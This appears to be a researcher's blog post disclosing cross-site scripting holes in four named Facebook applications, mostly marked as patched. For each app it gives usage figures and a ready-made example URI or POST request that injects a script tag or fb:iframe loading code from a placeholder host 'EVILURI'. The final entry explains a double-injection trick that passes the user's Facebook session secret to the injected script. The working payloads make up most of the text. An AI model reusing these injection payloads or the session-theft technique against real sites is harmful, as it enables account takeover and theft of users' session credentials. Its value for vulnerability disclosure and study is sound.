Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.
FAXX Hack: FunSpace
Facebook Verified Application
Current Monthly Active Users: 8,527,725
Current Rank on Application Leaderboard: 20
Application Developer: Slide, Inc.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC
FAXX Hack: SuperPoke!
Facebook Verified Application
Current Monthly Active Users: 2,097,148
Current Rank on Application Leaderboard: 71
Application Developer: Slide, Inc.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E
FAXX Hack: SocialToo
Current Monthly Active Users: 1,835
Application Developer: Stay N’ Alive Productions, LLC
Vulnerability Status: Patched
Capable of Clickjacking Install: No
Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\”><fb:iframe src=’http://EVILURI/’>
Notes: This application generally has extended permissions, such as status_update.
FAXX Hack: YellowPages.ca
Reported By: Uber0n at XSSed.com on March 22, 2009
Current Monthly Active Users: 1,198
Application Developer: Yellow Pages Group Co.
Vulnerability Status: Unpatched Patched as of Sep. 2, 2009
Capable of Clickjacking Install: No
Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada
Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.